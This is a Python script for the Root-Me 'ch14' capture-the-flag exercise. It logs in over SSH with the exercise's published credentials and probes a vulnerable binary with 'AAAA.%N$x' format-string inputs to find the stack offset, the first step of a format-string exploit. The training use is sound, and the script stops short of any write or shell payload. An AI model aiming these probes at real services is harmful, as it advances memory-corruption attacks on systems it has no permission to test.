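#!/usr/bin/env python3
"""Find the ``%N$x`` position at which a marker string placed in argv[1] of the
ch14 challenge binary shows up in its ``fmt=[...]`` output line.

Each probe is one SSH command that exec()s the binary with the probe as its
single argument.  Host, user and password are the published values for this
Root-Me exercise.
"""
import base64
import re
import shlex

import paramiko

HOST = "challenge02.root-me.org"
PORT = 2222
USER = "app-systeme-ch14"
PASSWORD = "app-systeme-ch14"
BIN = "/challenge/app-systeme/ch14/ch14"

# Marker bytes prepended to every probe; its hex form (41414141) is what we
# look for in the echoed output.
MARKER = b"AAAA"
# Exclusive upper bound of the ``%N$x`` positions probed by main().
MAX_OFFSET = 80


def run_payload(ssh: paramiko.SSHClient, payload: bytes, pty: bool = False) -> str:
    """Run the challenge binary once over *ssh* with *payload* as argv[1].

    The payload is base64-encoded before it is embedded in the remote ``python3
    -c`` snippet and the whole snippet is ``shlex.quote``d, so arbitrary bytes
    never reach the remote shell or the Python literal unescaped.

    Args:
        ssh: a connected ``paramiko.SSHClient``.
        payload: raw argv[1] bytes handed to the binary via ``os.execv``.
        pty: request a pseudo-terminal for the remote command.

    Returns:
        The command's stdout decoded as latin-1 (undecodable bytes dropped), so
        binary output can never raise here.  stderr is not captured.
    """
    b64 = base64.b64encode(payload).decode()
    py = f"import os,base64;p=base64.b64decode('{b64}');os.execv('{BIN}',[b'ch14',p])"
    cmd = "python3 -c " + shlex.quote(py)
    _, stdout, _ = ssh.exec_command(cmd, get_pty=pty)
    try:
        return stdout.read().decode("latin-1", "ignore")
    finally:
        # Release the exec channel explicitly instead of leaving it to GC;
        # one channel per probe would otherwise linger for the whole scan.
        stdout.channel.close()


def _find_offset(ssh: paramiko.SSHClient, max_offset: int = MAX_OFFSET) -> int | None:
    """Return the first position in ``range(1, max_offset)`` whose ``fmt=[...]``
    output contains the marker, printing it as it is found; ``None`` if none does.
    """
    marker_hex = MARKER.hex()  # "41414141", already lowercase
    for pos in range(1, max_offset):
        out = run_payload(ssh, MARKER + f".%{pos}$x".encode())
        m = re.search(r"fmt=\[(.*)\]", out)
        if m is None:
            continue
        if marker_hex in m.group(1).lower():
            print(f"[+] offset found: {pos}")
            print(f"[+] fmt output: {m.group(1)}")
            return pos
    return None


def main() -> None:
    """Connect, scan positions 1..MAX_OFFSET-1 and report the result."""
    ssh = paramiko.SSHClient()
    # Load ~/.ssh/known_hosts (silently skipped if absent) so that a host key
    # already recorded for [HOST]:PORT is checked: paramiko raises
    # BadHostKeyException on mismatch regardless of the missing-key policy.
    ssh.load_system_host_keys()
    # Hosts with no recorded key are still accepted on first contact.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(HOST, port=PORT, username=USER, password=PASSWORD, timeout=10)
    try:
        if _find_offset(ssh) is None:
            print("[-] offset not found in tested range")
    finally:
        ssh.close()


if __name__ == "__main__":
    main()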